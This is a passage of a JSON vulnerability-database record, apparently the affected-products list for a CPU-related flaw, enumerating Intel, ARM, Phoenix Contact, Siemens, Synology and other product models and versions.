        "model": "bl2 bpc 2000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7820hk"
      },
      {
        "model": "vl2 bpc 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1565l_v5"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8857_v2"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6440hq"
      },
      {
        "model": "router manager",
        "scope": "gte",
        "trust": 1.0,
        "vendor": "synology",
        "version": "1.1"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2670_v2"
      },
      {
        "model": "xeon e5 2620 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2400"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l3426"
      },
      {
        "model": "xeon e3 12201",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4308u"
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8168"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3758"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4330"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "760"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2650l_v4"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4830_v2"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4578u"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8870_v4"
      },
      {
        "model": "xeon e3 1505l v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "965"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "940"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4100e"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2540m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4210u"
      },
      {
        "model": "xeon e5 2418l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5120t"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4870_v2"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4702ec"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2807"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2730"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3630qm"
      },
      {
        "model": "xeon e5 2640 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770t"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3958"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "debian",
        "version": "9.0"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4765t"
      },
      {
        "model": "el ppc 1000\\/wt",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3508"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8890_v2"
      },
      {
        "model": "xeon e5 2608l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "local service management system",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "oracle",
        "version": "13.1"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "550"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3220t"
      },
      {
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4109t"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3010"
      },
      {
        "model": "xeon e3 1285l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4820_v3"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4690k"
      },
      {
        "model": "cortex-a8",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2105"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4510u"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2660_v4"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4770k"
      },
      {
        "model": "vl2 bpc 9000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "xeon e3 1268l v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2815"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2808"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3217ue"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3250t"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8100"
      },
      {
        "model": "xeon e5 1650 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "bl ppc 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3845"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4660_v4"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6167u"
      },
      {
        "model": "bl2 bpc 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2515e"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5157u"
      },
      {
        "model": "xeon gold",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6138"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4610y"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3337u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "580m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "750"
      },
      {
        "model": "xeon e5 1428l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3240t"
      },
      {
        "model": "xeon e5 2650l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4910mq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3740qm"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4870hq"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3785"
      },
      {
        "model": "xeon e5 2630 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4025u"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4430s"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2635qm"
      },
      {
        "model": "xeon e3 1285 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2630l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3229y"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4102e"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5667"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2690_v3"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4820"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3770t"
      },
      {
        "model": "xeon e5 2628l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8867_v4"
      },
      {
        "model": "cortex-a12",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4850"
      },
      {
        "model": "xeon e3 1258l v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4302y"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "330e"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3339y"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4710hq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8700k"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e5645"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8650u"
      },
      {
        "model": "xeon e3 1220 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon silver",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4116t"
      },
      {
        "model": "bl ppc15 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "cortex-a78",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3240"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2557m"
      },
      {
        "model": "core m7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6y75"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "380m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2450m"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "620lm"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "l5506"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8867_v3"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6267u"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e7540"
      },
      {
        "model": "xeon e3 1260l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3840qm"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5250u"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2695_v2"
      },
      {
        "model": "ubuntu linux",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "canonical",
        "version": "12.04"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2357m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4670k"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z2760"
      },
      {
        "model": "xeon e3 1225 v5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2930"
      },
      {
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3825"
      },
      {
        "model": "xeon e3 1245 v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2609 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2643",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2695_v4"
      },
      {
        "model": "xeon e5 2448l",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3805"
      },
      {
        "model": "xeon e5 2609 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3580"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6287u"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8860_v3"
      },
      {
        "model": "xeon e5 1660 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "virtual machine manager",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "synology",
        "version": "6.2-23739"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e6540"
      },
      {
        "model": "xeon e3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "1535m_v6"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5020u"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c3955"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "870"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "970"
      },
      {
        "model": "xeon e5 2403 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2643 v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4330te"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6500te"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4110e"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2667_v2"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5647"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "920xm"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3120me"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5015u"
      },
      {
        "model": "xeon e5 2407",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6500"
      },
      {
        "model": "xeon platinum",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8160m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2537m"
      },
      {
        "model": "xeon e3 1501l v6",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8893_v3"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4220y"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650l"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x7560"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100te"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "ec5549"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4650u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7700hq"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4300m"
      },
      {
        "model": "atom e",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "e3826"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6100e"
      },
      {
        "model": "xeon e5 2470",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4700ec"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n2810"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5850eq"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5850hq"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3770"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3735g"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "540m"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4690"
      },
      {
        "model": "vl ppc 3000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "simatic itc2200",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.1"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3770k"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6500t"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2320"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2530"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3470"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6400"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2600s"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3480"
      },
      {
        "model": "bl2 ppc 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "xeon e5 2650 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core m",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5y71"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3245"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3570"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4410e"
      },
      {
        "model": "cortex-a76",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "model": "dl ppc21.5m 7000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "6685r"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8880l_v2"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4170"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5560"
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5650"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "520e"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4667_v3"
      },
      {
        "model": "celeron n",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "n3450"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5575r"
      },
      {
        "model": "neoverse n1",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2550k"
      },
      {
        "model": "xeon e5 2430",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3736g"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2803"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4600m"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4607_v2"
      },
      {
        "model": "simatic itc1500",
        "scope": "lt",
        "trust": 1.0,
        "vendor": "siemens",
        "version": "3.1"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2100t"
      },
      {
        "model": "atom z",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "z3795"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4700mq"
      },
      {
        "model": "vl bpc 2000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4202y"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7660u"
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "5005u"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2660_v2"
      },
      {
        "model": "xeon e7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "8880_v2"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3612qe"
      },
      {
        "model": "valueline ipc",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "xeon",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "x5672"
      },
      {
        "model": "xeon e5 2430 v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4250u"
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "7920hq"
      },
      {
        "model": "xeon e3 1245",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "esxi",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "vmware",
        "version": "5.5.0"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "3437u"
      },
      {
        "model": "vl2 ppc9 1000",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "phoenixcontact",
        "version": null
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2658_v4"
      },
      {
        "model": "cortex-r7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "arm",
        "version": null
      },
      {
        "model": "core i7",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "4720hq"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2658_v2"
      },
      {
        "model": "visunet rm shell",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "pepperl fuchs",
        "version": null
      },
      {
        "model": "xeon e5 2650l v3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "core i3",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2310m"
      },
      {
        "model": "atom c",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "c2518"
      },
      {
        "model": "celeron j",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "j1900"
      },
      {
        "model": "core i5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2310"
      },
      {
        "model": "xeon e5",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": "2699a_v4"
      },
      {
        "model": "xeon e5 2603 v4",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
        "model": "xeon e5 2628l v2",
        "scope": "eq",
        "trust": 1.0,
        "vendor": "intel",
        "version": null
      },
      {
